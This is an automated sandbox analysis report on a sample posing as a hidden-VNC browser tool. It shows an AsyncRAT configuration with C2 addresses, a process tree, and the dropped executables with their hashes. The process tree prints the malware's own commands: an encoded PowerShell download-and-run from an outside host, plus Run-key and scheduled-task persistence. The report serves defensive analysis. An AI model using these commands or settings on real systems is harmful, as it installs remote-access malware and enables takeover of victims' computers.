Analysis

  • max time kernel
    166s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2023 14:11

General

  • Target

    Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx-main/Pandora Hvnc Hidden B Vnc/H.scr

  • Size

    799KB

  • MD5

    98d7999986d63fbd914bddc3d7b7ecf9

  • SHA1

    7c528fb3cc427791482f7a84923a21621cfb9675

  • SHA256

    144a026bb63a29b36a3437094c4f53cf1cb135edcbe15ab06e35fb8759129bfc

  • SHA512

    13bb42bf2078b3407af5786e9c1d057a306cba561519f905e4ba3fa1acaf8687551c70941775daa89394384808b6524659cda354a715e5ab3c3cba558c065616

  • SSDEEP

    12288:v41SrH22qla5w/yXbxixFcRMFQIkeNCSo9mbX8:v0SrH0MW/IbxiYCQIkeNCSBQ

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

217.64.31.3:8808

217.64.31.3:8437

Mutex

Windows System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    Windows Session Manager

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect PureCrypter injector 1 IoCs
  • Detect ZGRat V1 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx-main\Pandora Hvnc Hidden B Vnc\H.scr
    "C:\Users\Admin\AppData\Local\Temp\Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx-main\Pandora Hvnc Hidden B Vnc\H.scr" /S
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE
      "C:\Users\Admin\AppData\Roaming\REALFINAL.EXE"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3772
        • C:\Windows\SysWOW64\timeout.exe
          timeout /nobreak /t 20
          4⤵
          • Delays execution with timeout.exe
          PID:1944
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout 40
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\SysWOW64\timeout.exe
          timeout 40
          4⤵
          • Delays execution with timeout.exe
          PID:1232
      • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
        "C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
          "C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4880
        • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
          "C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'
            5⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1252
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:648
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:3592
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            #cmd
            5⤵
              PID:5024
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          3⤵
            PID:3124
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:4860

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        192B

        MD5

        efbcc7a03e3de35b4a9dd47bf81b1eef

        SHA1

        44a8472c5c590e1b03b12d146caeb20c90c5c08c

        SHA256

        89be0f16f750aeb8a7aa5535b57a1d4850ecc79393716151f3502fe10c540b7e

        SHA512

        d948aca38d87cc7697d853c469c8ac135b1edb1c083a8325d4403b9072ea04f96744bf7f7f1f44f881d075ba7abdbd6f10e401f98b65c1681be20fbed3d0a0b0

      • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

        Filesize

        146KB

        MD5

        1a9c46f2b4420d156a82f160facf9376

        SHA1

        ce91faa7353cb4d3411b20a69350f27a6fe47990

        SHA256

        04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

        SHA512

        14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

      • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

        Filesize

        146KB

        MD5

        1a9c46f2b4420d156a82f160facf9376

        SHA1

        ce91faa7353cb4d3411b20a69350f27a6fe47990

        SHA256

        04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

        SHA512

        14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

      • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

        Filesize

        146KB

        MD5

        1a9c46f2b4420d156a82f160facf9376

        SHA1

        ce91faa7353cb4d3411b20a69350f27a6fe47990

        SHA256

        04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

        SHA512

        14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybg1lddz.rpt.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE

        Filesize

        501KB

        MD5

        8b662719e44ab11419fe3e1d7e96cc03

        SHA1

        af6c092ff304cd5131cc0295fa8b51a572af5388

        SHA256

        0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

        SHA512

        3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

      • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE

        Filesize

        501KB

        MD5

        8b662719e44ab11419fe3e1d7e96cc03

        SHA1

        af6c092ff304cd5131cc0295fa8b51a572af5388

        SHA256

        0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

        SHA512

        3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

      • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE

        Filesize

        501KB

        MD5

        8b662719e44ab11419fe3e1d7e96cc03

        SHA1

        af6c092ff304cd5131cc0295fa8b51a572af5388

        SHA256

        0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

        SHA512

        3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

      • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

        Filesize

        6KB

        MD5

        a0c1d68c150049944598f3927176a4b9

        SHA1

        bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

        SHA256

        fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

        SHA512

        c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

      • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

        Filesize

        6KB

        MD5

        a0c1d68c150049944598f3927176a4b9

        SHA1

        bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

        SHA256

        fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

        SHA512

        c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

      • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

        Filesize

        6KB

        MD5

        a0c1d68c150049944598f3927176a4b9

        SHA1

        bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

        SHA256

        fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

        SHA512

        c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

      • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

        Filesize

        87KB

        MD5

        81230dd9258eebd0fe6a2cc681c43c51

        SHA1

        d6870e6014503e79589435d3b167f1c6e405721b

        SHA256

        9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

        SHA512

        2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

      • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

        Filesize

        87KB

        MD5

        81230dd9258eebd0fe6a2cc681c43c51

        SHA1

        d6870e6014503e79589435d3b167f1c6e405721b

        SHA256

        9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

        SHA512

        2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

      • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

        Filesize

        87KB

        MD5

        81230dd9258eebd0fe6a2cc681c43c51

        SHA1

        d6870e6014503e79589435d3b167f1c6e405721b

        SHA256

        9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

        SHA512

        2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

      • memory/1252-140-0x00000000077C0000-0x00000000077C8000-memory.dmp

        Filesize

        32KB

      • memory/1252-108-0x00000000061A0000-0x00000000061EC000-memory.dmp

        Filesize

        304KB

      • memory/1252-129-0x0000000006700000-0x000000000671E000-memory.dmp

        Filesize

        120KB

      • memory/1252-119-0x0000000074840000-0x000000007488C000-memory.dmp

        Filesize

        304KB

      • memory/1252-118-0x0000000006770000-0x00000000067A2000-memory.dmp

        Filesize

        200KB

      • memory/1252-131-0x0000000007AE0000-0x000000000815A000-memory.dmp

        Filesize

        6.5MB

      • memory/1252-132-0x00000000074A0000-0x00000000074BA000-memory.dmp

        Filesize

        104KB

      • memory/1252-133-0x0000000007510000-0x000000000751A000-memory.dmp

        Filesize

        40KB

      • memory/1252-114-0x0000000002840000-0x0000000002850000-memory.dmp

        Filesize

        64KB

      • memory/1252-134-0x0000000007720000-0x00000000077B6000-memory.dmp

        Filesize

        600KB

      • memory/1252-112-0x0000000002840000-0x0000000002850000-memory.dmp

        Filesize

        64KB

      • memory/1252-136-0x00000000076A0000-0x00000000076B1000-memory.dmp

        Filesize

        68KB

      • memory/1252-109-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/1252-107-0x0000000006160000-0x000000000617E000-memory.dmp

        Filesize

        120KB

      • memory/1252-106-0x0000000005C60000-0x0000000005FB4000-memory.dmp

        Filesize

        3.3MB

      • memory/1252-144-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/1252-77-0x0000000002890000-0x00000000028C6000-memory.dmp

        Filesize

        216KB

      • memory/1252-141-0x0000000007800000-0x0000000007822000-memory.dmp

        Filesize

        136KB

      • memory/1252-95-0x0000000005AF0000-0x0000000005B56000-memory.dmp

        Filesize

        408KB

      • memory/1252-130-0x0000000007370000-0x0000000007413000-memory.dmp

        Filesize

        652KB

      • memory/1252-81-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/1252-139-0x00000000077E0000-0x00000000077FA000-memory.dmp

        Filesize

        104KB

      • memory/1252-138-0x00000000076E0000-0x00000000076F4000-memory.dmp

        Filesize

        80KB

      • memory/1252-83-0x0000000002840000-0x0000000002850000-memory.dmp

        Filesize

        64KB

      • memory/1252-89-0x0000000005A80000-0x0000000005AE6000-memory.dmp

        Filesize

        408KB

      • memory/1252-137-0x00000000076D0000-0x00000000076DE000-memory.dmp

        Filesize

        56KB

      • memory/1252-87-0x00000000052E0000-0x0000000005908000-memory.dmp

        Filesize

        6.2MB

      • memory/1252-88-0x00000000051A0000-0x00000000051C2000-memory.dmp

        Filesize

        136KB

      • memory/1468-104-0x00007FFAFFD70000-0x00007FFB00831000-memory.dmp

        Filesize

        10.8MB

      • memory/1468-49-0x0000000000340000-0x0000000000348000-memory.dmp

        Filesize

        32KB

      • memory/1468-62-0x00007FFAFFD70000-0x00007FFB00831000-memory.dmp

        Filesize

        10.8MB

      • memory/2756-64-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/2756-63-0x0000000005040000-0x0000000005050000-memory.dmp

        Filesize

        64KB

      • memory/2756-58-0x0000000000640000-0x000000000065C000-memory.dmp

        Filesize

        112KB

      • memory/2756-79-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/3124-102-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/3124-96-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/3124-105-0x0000000005460000-0x0000000005470000-memory.dmp

        Filesize

        64KB

      • memory/3124-135-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/3936-17-0x0000000005800000-0x0000000005DA4000-memory.dmp

        Filesize

        5.6MB

      • memory/3936-15-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/3936-24-0x0000000006720000-0x000000000676C000-memory.dmp

        Filesize

        304KB

      • memory/3936-103-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/3936-18-0x0000000005250000-0x00000000052E2000-memory.dmp

        Filesize

        584KB

      • memory/3936-19-0x0000000005380000-0x0000000005390000-memory.dmp

        Filesize

        64KB

      • memory/3936-20-0x0000000005230000-0x000000000523A000-memory.dmp

        Filesize

        40KB

      • memory/3936-16-0x00000000007C0000-0x0000000000842000-memory.dmp

        Filesize

        520KB

      • memory/3936-21-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/3936-22-0x0000000005380000-0x0000000005390000-memory.dmp

        Filesize

        64KB

      • memory/3936-23-0x00000000066B0000-0x0000000006724000-memory.dmp

        Filesize

        464KB

      • memory/4880-85-0x0000024845B30000-0x0000024845B40000-memory.dmp

        Filesize

        64KB

      • memory/4880-80-0x0000024845B30000-0x0000024845B40000-memory.dmp

        Filesize

        64KB

      • memory/4880-115-0x0000024845B30000-0x0000024845B40000-memory.dmp

        Filesize

        64KB

      • memory/4880-116-0x0000024845B30000-0x0000024845B40000-memory.dmp

        Filesize

        64KB

      • memory/4880-148-0x00007FFAFFD70000-0x00007FFB00831000-memory.dmp

        Filesize

        10.8MB

      • memory/4880-111-0x0000024845B30000-0x0000024845B40000-memory.dmp

        Filesize

        64KB

      • memory/4880-110-0x00007FFAFFD70000-0x00007FFB00831000-memory.dmp

        Filesize

        10.8MB

      • memory/4880-74-0x000002482D4F0000-0x000002482D512000-memory.dmp

        Filesize

        136KB

      • memory/4880-84-0x0000024845B30000-0x0000024845B40000-memory.dmp

        Filesize

        64KB

      • memory/4880-78-0x00007FFAFFD70000-0x00007FFB00831000-memory.dmp

        Filesize

        10.8MB

      • memory/5024-113-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/5024-82-0x0000000074990000-0x0000000075140000-memory.dmp

        Filesize

        7.7MB

      • memory/5024-75-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

      • memory/5024-86-0x0000000005660000-0x0000000005670000-memory.dmp

        Filesize

        64KB

      • memory/5024-117-0x0000000005660000-0x0000000005670000-memory.dmp

        Filesize

        64KB